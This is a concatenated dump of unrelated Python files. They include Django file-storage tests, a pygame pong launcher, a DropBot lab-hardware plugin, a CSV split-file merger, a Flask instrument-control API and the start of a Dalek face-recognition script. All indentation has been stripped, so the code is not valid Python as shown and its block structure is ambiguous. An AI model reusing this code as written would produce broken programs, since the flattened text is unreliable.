self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
six.assertRegex(self, obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
six.assertRegex(self, obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
six.assertRegex(self, names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
six.assertRegex(self, names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
self.assertRaisesMessage(
SuspiciousFileOperation, 'Storage can not find an available filename',
objs[1].limited_length.save, *(filename, ContentFile('Same Content'))
)
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_old_style_storage(self):
# Testing backward-compatibility with old-style storage backends that
# don't take ``max_length`` parameter in ``get_available_name()``
# and save(). A deprecation warning should be raised.
obj = Storage()
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
obj.old_style.save('deprecated_storage_test.txt', ContentFile('Same Content'))
self.assertEqual(len(warns), 2)
self.assertEqual(
str(warns[0].message),
'Backwards compatibility for storage backends without support for '
'the `max_length` argument in Storage.save() will be removed in '
'Django 1.10.'
)
self.assertEqual(
str(warns[1].message),
'Backwards compatibility for storage backends without support for '
'the `max_length` argument in Storage.get_available_name() will '
'be removed in Django 1.10.'
)
self.assertEqual(obj.old_style.name, 'tests/deprecated_storage_test.txt')
self.assertEqual(obj.old_style.read(), b'Same Content')
obj.old_style.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
six.assertRegex(self, files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
six.assertRegex(self, files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
six.assertRegex(self, files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
both if it was initialized with string or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
retropong.py
|
import threading
import pygame
import ball
import bar
import mainWindow
import randomball
import time
import os
from randomMusicplayer import WavPlayerRandom
from multiprocessing import Process
# Thread List
threads = []
BALLSPEED = 1
MUSIC_ON = True
SOUND_ON = True
PVP_CONTROL = True
COMPUTERONLYCONTROL = True
TIME_SINCE_GAME_START = time.time()
if __name__ == '__main__':
pygame.init()
soundObj = pygame.mixer.Sound(
os.path.abspath('ResourcesInUse/GameStart.wav'))
soundObj.play()
TIME_SINCE_GAME_START = time.time()
# Init the entities
bar1 = bar.bar([30, 30], 620, 480, 30, 120)
bar2 = bar.bar([620 - 60, 30], 620, 480, 30, 120)
ball = ball.ball([mainWindow.mainWindow.screenwidth / 2,
mainWindow.mainWindow.screenheight / 2], 620, 480, 10, 0)
randomball.randomBallEngine(ball)
main = mainWindow.mainWindow(bar1, bar2, ball)
main.createOne()
# Start the window thread inside the main thread -> The app is single-threaded for now
main.mainWindowLoop(PVP_CONTROL).start()
# Multi threading support
# x = threading.Thread(target=mainWindow.mainWindow.mainWindowLoop, args=(PVP_CONTROL,))
# threads.append(x)
# Start only the window thread - Cython blocks concurrency
# threads[0].start()
print("Game End\nHope you enjoy the game. Please check my github page: github.com/MatthewAlgo")
# End
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
__init__.py
|
import asyncio
import json
import threading
from threading import Thread
import numpy as np
import pydash as _
from si_prefix import si_format, si_parse
from dropbot import SerialProxy
from micropede.client import MicropedeClient , dump_stack
from micropede.async import MicropedeAsync
SCHEMA = {
"type": "object",
"properties": {
"voltage": {
"type": "number",
"default": 100,
"per_step": True
},
"frequency": {
"type": "number",
"default": 10000,
"per_step": False
},
"__hv_output_enabled__": {
"type": "boolean",
"default": False
},
"__hv_output_selected__": {
"type": "boolean",
"default": True
},
"__channel_count__": {
"type": "integer",
"default": 0
},
"__capacitance_update_interval_ms__": {
"type": "integer",
"default": 0,
"minimum": 0
},
"__target_capacitance__": {
"type": "number",
"default": 0
}
}
}
def setup_serial_proxy(self):
class Y(object): pass
Y.control_board = None
Y.ready_event = threading.Event()
Y.err = False
def start_thread(x):
try:
x.control_board = SerialProxy()
except Exception as e:
x.err = e
x.ready_event.set()
t = Thread(target=start_thread, args=(Y,))
t.start()
Y.ready_event.wait()
if (Y.err):
raise(Y.err)
self.control_board = Y.control_board
APPNAME = "microdrop"
class DropBot(MicropedeClient):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
async def update_board_info(self):
info = {}
_.assign(info, json.loads(self.control_board.config.to_json()))
_.assign(info, json.loads(self.control_board.state.to_json()))
_.assign(info, json.loads(self.control_board.properties.to_json()))
_.assign(info, {"uuid": str(self.control_board.uuid)})
await self.set_state('info', info)
def listen(self):
setup_serial_proxy(self)
self.control_board.hv_output_enabled = True
self.control_board.hv_output_selected = True
self.on_put_msg("frequency", self.put_frequency)
self.on_put_msg("voltage", self.put_voltage)
self.on_trigger_msg("connect-dropbot", self.connect_dropbot)
self.on_trigger_msg("measure-capacitance", self.measure_capacitance)
self.on_trigger_msg("measure-voltage", self.measure_voltage)
self.on_trigger_msg("put-voltage-frequency", self.put_voltage_frequency)
self.on_state_msg("electrodes-model", "active-electrodes", self.turn_on_electrodes)
self.on_state_msg("electrodes-model", "voltage", self.change_voltage)
self.on_state_msg("electrodes-model", "frequency", self.change_frequency)
self.on_state_msg("dropbot-ui-plugin", "{key}", self.modify_status)
self.wait_for(self.update_board_info())
async def change_voltage(self, voltage, params):
try:
print("CHANGING :) VOLTAGE!!!")
# Convert payload from si_unit string to number
print("CALLING PSI PARSE:", voltage);
voltage = si_parse(_.replace(voltage, "V", ""))
print("ITS NOW: ", voltage)
await self.put_voltage({"voltage": voltage}, {})
await self.update_board_info()
except Exception as e:
print("Error setting voltage")
print(e)
async def change_frequency(self, frequency, params):
try:
print("FREQ", frequency)
frequency = si_parse(_.replace(frequency, "Hz", ""))
await self.put_frequency({"frequency": frequency}, params)
await self.update_board_info()
except Exception as e:
print("Error setting frequency")
print(e)
async def put_voltage_frequency(self, payload, params):
self.control_board.voltage = float(payload["voltage"])
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
async def turn_on_electrodes(self, payload, params):
# Get the three object from device-model
microdrop = MicropedeAsync(APPNAME,port=self.port,loop=self.loop)
three_object = await microdrop.get_state('device-model', 'three-object')
active_electrodes = payload
def active_filter(obj):
return _.includes(active_electrodes, obj["id"])
active_objects = _.filter_(three_object, active_filter)
channels = _.map_(_.map_(active_objects, "channel"), int)
max_channels = self.control_board.number_of_channels
channel_states = np.zeros(max_channels, dtype=int)
channel_states[channels] = 1
self.control_board.set_state_of_channels(channel_states)
print(self.control_board.state_of_channels)
await self.update_board_info()
async def measure_voltage(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
voltage = self.control_board.measure_voltage()
self.notify_sender(payload, voltage, "measure-voltage")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-voltage", "failed")
async def measure_capacitance(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
capacitance = self.control_board.measure_capacitance()
self.notify_sender(payload, capacitance, "measure-capacitance")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-capacitance", "failed")
async def connect_dropbot(self, payload, params):
try:
setup_serial_proxy(self)
await self.update_board_info()
self.notify_sender(payload, "connected!", "connect-dropbot")
except Exception as e:
print("ERROR::", e)
self.notify_sender(payload, dump_stack(self.name, e),
"connect-dropbot", "failed")
async def put_frequency(self, payload, params):
""" Set the switching frequency of the active fluxels"""
try:
self.validate_schema(payload)
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
self.notify_sender(payload, self.control_board.frequency, "frequency")
except Exception as e:
print(e)
self.notify_sender(payload, dump_stack(self.client.name, e),
"frequency", "failed")
async def put_voltage(self, payload, params):
""" Set the on voltage for fluxels"""
try:
print("PUT VOLTAGE CALLED!")
self.validate_schema(payload)
self.control_board.voltage = float(payload["voltage"])
print("SETTING STATE OF VOLTAGE TO:", payload["voltage"])
print("SETTING STATE!!")
await self.update_board_info()
print("SET SUCCESSFUL")
self.notify_sender(payload, self.control_board.voltage, "voltage")
except Exception as e:
print(e)
self.notify_sender(payload, dump_stack(self.client.name, e),
"voltage", "failed")
print("Running dropbot plugin")
dropbot = DropBot("microdrop", host="localhost", port=1884, name="dropbot")
|
merge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: rjayapalan
Created: March 09, 2022
"""
import os
import csv
from typing import Callable, Optional
import logging
import time
from .common import constant, error
log = logging.getLogger(__name__)
class Merge:
def __init__(self, inputdir: str, outputdir: str, outputfilename: str) -> None:
"""Constructor
Args:
inputdir (str): Dir path to the split files
outputdir (str): Dir path for the output file
outputfilename (str): Filename for the final merged file
"""
log.info('Starting file merge process')
if not os.path.isdir(inputdir):
raise NotADirectoryError(
f'Given input directory path "{inputdir}" is not a valid directory.')
if not os.path.isdir(outputdir):
raise NotADirectoryError(
f'Given output directory path "{outputdir}" is not a valid directory.')
self._inputdir = inputdir
self._outputdir = outputdir
self._outputfilename = outputfilename
self._terminate = False
self._manfilename = constant.MANIFEST_FILE_NAME
self._starttime = time.time()
@property
def terminate(self) -> bool:
"""Returns terminate flag value
Returns:
bool: True/False
"""
return self._terminate
@property
def inputdir(self) -> str:
"""Returns path to the input dir
Returns:
str: Dir path
"""
return self._inputdir
@property
def outputdir(self) -> str:
"""Returns output dir path
Returns:
str: Dir path
"""
return self._outputdir
@property
def outputfilename(self) -> str:
"""Returns output filename
Returns:
str: Output filename
"""
return self._outputfilename
@property
def manfilename(self) -> str:
"""Returns manifest filename
Returns:
str: Manifest filename
"""
return self._manfilename
@terminate.setter
def terminate(self, value: bool) -> None:
"""Sets terminate flag that will terminate the process
Args:
value (bool): True/False
"""
self._terminate = value
@manfilename.setter
def manfilename(self, value: str) -> None:
"""Sets manifest filename
Args:
value (str): Manifest filename
"""
self._manfilename = value
def _getmanifestpath(self) -> str:
"""Returns manifest filepath
Returns:
str: Manifest filepath
"""
filepath = os.path.join(self.inputdir, self.manfilename)
if not os.path.exists(filepath):
raise FileNotFoundError(
f'Manifest file "{self.manfilename}" not found in "{self.inputdir}"')
return filepath
def _getoutputfilepath(self) -> str:
"""Returns absolute path of the output file
Returns:
str: Output file path
"""
filepath = os.path.join(self.outputdir, self.outputfilename)
return filepath
def _endprocess(self):
"""Runs statements that marks the completion of the process
"""
endtime = time.time()
runtime = int((endtime - self._starttime)/60)
log.info(f'Process completed in {runtime} min(s)')
def merge(self, cleanup: bool = False, callback: Optional[Callable] = None) -> None:
"""Merges the split files back into one single file
Args:
cleanup (bool, optional): If true, all the split files and manifest
file will be purged after successful merge. Defaults to False.
callback (Optional[Callable], optional): Callback function to invoke
after all the splits have been merged.
The callback passes merged file path, size [str, int] as args.
Defaults to None.
"""
manfile = self._getmanifestpath()
outputfile = self._getoutputfilepath()
with open(manfile, mode='r', encoding='utf8', newline='') as reader:
with open(outputfile, mode='wb+') as writer:
csvreader = csv.DictReader(reader)
skipheader = False
for line in csvreader:
if self.terminate:
log.info('Term flag has been set by the user.')
log.info('Terminating the process.')
break
splitfilename = line['filename']
splitfile = os.path.join(self.inputdir, splitfilename)
header = True if line['header'].lower(
) == 'true' else False
with open(splitfile, mode='rb') as splitreader:
if skipheader:
next(splitreader)
for line in splitreader:
writer.write(line)
if header:
skipheader = True
if cleanup and not self.terminate:
with open(manfile, mode='r', encoding='utf8', newline='') as reader:
csvreader = csv.DictReader(reader)
for line in csvreader:
splitfilename = line['filename']
splitfile = os.path.join(self.inputdir, splitfilename)
if os.path.exists(splitfile):
os.remove(splitfile)
if os.path.exists(manfile):
os.remove(manfile)
if callback:
callback(outputfile, os.path.getsize(outputfile))
self._endprocess()
# if __name__ == '__main__':
# import threading
# import time
# def cb(path, size):
# print(f'{path} : {size}')
# def terminatemerge(mergeinstance: Merge, after: int):
# time.sleep(after)
# mergeinstance.terminate = True
# print('terminating')
# merge = Merge(inputdir='/Users/rjayapalan/Downloads/split_test',
# outputdir='/Users/rjayapalan/Downloads/split_test',
# outputfilename='mergedfile.csv',
# )
# th = threading.Thread(target=terminatemerge, args=(merge, 2))
# th.daemon = True
# th.start()
# merge.merge(cleanup=True, callback=cb)
|
api.py
|
from flask import Flask, request, render_template
import requests
import json
import importlib, inspect
from parametric import Parameter, Instrument
from parametric.factory import Knob, Switch, Measurement, Selector
from vigilant import Monitor
import attr
from threading import Thread
from optimistic.algorithms import *
from flask_socketio import SocketIO
from functools import partial
import uuid
class API:
def __init__(self, namespace, addr='127.0.0.1', port=8000, debug=False, measurement='test'):
self.addr = addr
self.port = port
self.namespace = namespace
self.debug = debug
self.connected = False
self.monitor = Monitor(period=1, dashboard='Dashboard', measurement=measurement)
self.monitor.start()
def get(self, endpoint):
if endpoint[0] == '/':
endpoint = endpoint[1:]
text = requests.get(f'http://{self.addr}:{self.port}/{endpoint}').text
try:
text = json.loads(text)
except json.JSONDecodeError:
pass
return text
def post(self, endpoint, payload):
''' POST a json-compatible payload to an endpoint '''
if endpoint[0] == '/':
endpoint = endpoint[1:]
response = requests.post(f'http://{self.addr}:{self.port}/{endpoint}', json=payload)
return json.loads(response.text)
@staticmethod
def search(type_, namespace, return_dict=False, name=None):
''' Returns all instances of a passed type in the dictionary. If no namespace is passed, search in globals(). '''
instances = []
for x in namespace.keys():
if isinstance(namespace[x], type_):
instances.append(namespace[x])
if name is not None:
for i in instances:
if i.name == name:
return i
if return_dict:
d = {}
for x in instances:
d[x.name] = x
return d
return instances
def run(self):
self.thread = Thread(target=self.serve)
self.thread.start()
def serve(self):
app = Flask(__name__)
socketio = SocketIO(app, async_mode="threading")
@socketio.on("connect")
def connect():
self.connected = True
def emit_parameter_update(id, value):
socketio.emit('parameter', {'id': id,
'value': value})
def prepare_state(state=None, namespace=None, parent_id=None, return_handle=False, path=''):
''' Recursively search through instruments and prepare a flattened state
First pass: look for parameters in the current namespace and add them to the state;
then, iterate through all instruments
Second pass: look for parameters in each instrument namespace, then iterate through all instruments '''
if namespace is None:
namespace = self.namespace
if state is None:
state = {'knobs': {}, 'switches': {}, 'selectors': {}, 'measurements': {}, 'instruments': {}}
''' Search parameters within namespace '''
for child in self.search(Parameter, namespace, return_dict=True).values():
entry = {'name': child.name, 'instrument': parent_id, 'path': path + child.name}
if isinstance(child, Knob):
id = str(len(state['knobs']))
entry['value'] = child.get()
entry['min'] = child.bounds[0]
entry['max'] = child.bounds[1]
if return_handle:
entry['handle'] = child
state['knobs'][id] = entry
state['instruments'][parent_id]['knobs'].append(id)
child.callbacks['api'] = partial(emit_parameter_update, id)
elif isinstance(child, Switch):
id = str(len(state['switches']))
entry['value'] = child.get()
if return_handle:
entry['handle'] = child
state['switches'][id] = entry
state['instruments'][parent_id]['switches'].append(id)
elif isinstance(child, Measurement):
id = str(len(state['measurements']))
entry['min'] = child.bounds[0]
entry['max'] = child.bounds[1]
if return_handle:
entry['handle'] = child
child.id = id
state['measurements'][id] = entry
state['instruments'][parent_id]['measurements'].append(id)
elif isinstance(child, Selector):
id = str(len(state['selectors']))
entry['value'] = child.get()
entry['options'] = child.options
if return_handle:
entry['handle'] = child
state['selectors'][id] = entry
state['instruments'][parent_id]['selectors'].append(id)
''' Search instruments '''
for instrument in self.search(Instrument, namespace, return_dict=True).values():
instrument_entry = {'name': instrument.name,
'path': path + instrument.name + '/',
'children': [],
'switches': [],
'selectors': [],
'knobs': [],
'measurements': [],
'parent': None}
instrument_id = str(len(state['instruments']))
if parent_id is not None:
state['instruments'][parent_id]['children'].append(instrument_id)
instrument_entry['parent'] = parent_id
if return_handle:
instrument_entry['handle'] = instrument
state['instruments'][instrument_id] = instrument_entry
state = prepare_state(state,
namespace = instrument.__dict__,
parent_id = instrument_id,
return_handle = return_handle,
path = instrument_entry['path'])
return state
def get_measurement_id(state, measurement):
for id in state['measurements']:
if state['measurements'][id]['handle'] is measurement:
return id
def find_observers(state):
observers = []
for category in self.monitor.categories:
for name, observer in self.monitor.categories[category].items():
id = get_measurement_id(state, observer._measure)
observers.append(id)
return observers
@app.route("/")
def hello():
frontend_state = prepare_state()
self.state = prepare_state(return_handle=True)
self.state['observers'] = find_observers(self.state)
frontend_state['observers'] = self.state['observers']
app.config['state'] = self.state
app.config['results'] = {}
app.config['monitor'] = self.monitor
return render_template('index.html', state=frontend_state)
''' Parametric endpoints '''
from .parameters import parameters
app.register_blueprint(parameters, url_prefix='/')
''' Optimistic endpoints '''
from .optimization import optimization
app.register_blueprint(optimization, url_prefix='/optimistic')
''' Vigilant endpoints '''
from .monitoring import monitoring
app.register_blueprint(monitoring, url_prefix='/monitor')
socketio.run(app, host=self.addr, port=self.port, debug=self.debug)
|
dalek_state.py
|
#!/usr/bin/env python3
"""Dalek State Machine
This module provides a state machine that enables a Dalek to recognise people within
its field of view and either welcome them by name, or threaten them if it doesn't
recognise them. It assumes:
* the use of an Adafruit Servo Controller to control an iris servo
and the lights within the eye and dome (using a TIP120 transistor to amplify the PWM signal)
* a Pi High Quality camera with 6mm lens
* a Google Coral TPU to provide acceleration for the face detection function
* a database of face descriptors and labels as created by the training.py program
(so be sure to run that program first!)
* a USB microphone and an amplifier for the dalek voice
The Dalek operator can also optionally activate and deactivate the Dalek via an MQTT message
over Bluetooth BLE; this assumes that there is a localhost MQTT server
Example:
$ python3 dalek_state.py
Todo:
* Add in the hover lights on an additional servo channel
* Use the location and eye distance of the detected face to calculate distance and
bearing so the dome can swivel to look directly at the persons being talked to
Userful blog posts for setup: https://k9-build.blogspot.com/search/label/dalek
Dalek and K9 word marks and logos are trade marks of the British Broadcasting Corporation and
are copyright BBC/Terry Nation 1963
"""
import os
import time
import random
from threading import Thread
# import servo board
from board import SCL, SDA
import busio
from adafruit_pca9685 import PCA9685
# import image and DL processing
import cv2
import numpy as np
import dlib
from edgetpu.detection.engine import DetectionEngine
from imutils.video import VideoStream
from PIL import Image
# import audio and messaging
import pyaudio
import paho.mqtt.client as mqtt
# import local helper classes
from faceextractor import FaceDataExtractor
from recognizer import FaceRecognizer
FREQUENCY = 50
PERIOD = 1.0 / float(FREQUENCY) * 1000.0
# create iris servo
i2c_bus = busio.I2C(SCL, SDA)
pca = PCA9685(i2c_bus)
pca.frequency = FREQUENCY
# Initialise the pygame mixer for sound and sound effect
#pygame.mixer.init()
#pygame.mixer.music.load("./controlroom.wav")
DEAD_TIME = 30 # minimum time in seconds between doorman annoucemnents
EVENT_GAP = 5 # maximum time window in seconds for valid detection events
# no. of recognition events needed with less than
# EVENT_GAP between them to hit threshold
THRESHOLD = 3
UNKNOWN_THRESHOLD = 5 # numer of unknown events to hit threshold
UNKNOWN_GAP = 30 # maximum time window in seconds for valid uknown events
SAMPLES = 8 # number of training photos per person (limit 50 in total)
CHUNK = 2**13 # buffer size for audio capture and analysis
